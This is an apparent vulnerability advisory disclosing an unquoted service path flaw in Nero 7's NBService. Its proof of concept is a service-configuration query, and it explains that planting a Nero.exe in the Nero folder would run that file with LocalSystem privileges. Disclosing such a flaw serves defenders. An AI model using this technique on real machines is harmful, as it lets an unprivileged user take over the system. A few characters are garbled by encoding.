# Exploit Title:  Nero 7 Unquoted Service Path Elevation Of Privilege
# Disclosure Date: 09/11/2016
# Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r
# http://www.realistic-security.org
# Version:  Nero version 7.10.1.0
# Tested on: Windows 7 integral edition FR
# CVE : N/A

Vulnerability Details:
=====================
The nero 7 suffers from an unquoted search path issue impacting the 
service "NBService" leading to arbitrary code execution, this could 
potentially allow an authorized unprivileged user to invoke  a malicious 
peice of code with elevated privileges.
A successful exploit requires a local user to put its own code in the 
path of the vulnerable application where it could potentially be 
executed during the software startup or system reboot.

PoC
-- 
[PentestingSkills.BlackBox] a$? sc qc NBService
[SC] QueryServiceConfig rA(c)ussite(s)

SERVICE_NAME: NBService
         TYPE               : 10  WIN32_OWN_PROCESS
         START_TYPE         : 3   DEMAND_START
         ERROR_CONTROL      : 1   NORMAL
         BINARY_PATH_NAME   : C:\Program Files (x86)\Nero\Nero 7\Nero 
BackItUp\NBService.exe
         LOAD_ORDER_GROUP   :
         TAG                : 0
         DISPLAY_NAME       : NBService
         DEPENDENCIES       : RPCSS
         SERVICE_START_NAME : LocalSystem

notice the path C:\Program Files (x86)\Nero\Nero 7\Nero 
BackItUp\NBService.exe unquoted !!
a malicious local user could put in place its own executable as Nero.exe 
under C:\Program Files (x86)\Nero\ to be then executed once the 
application starts up or the system reboots.

sh311c0d3r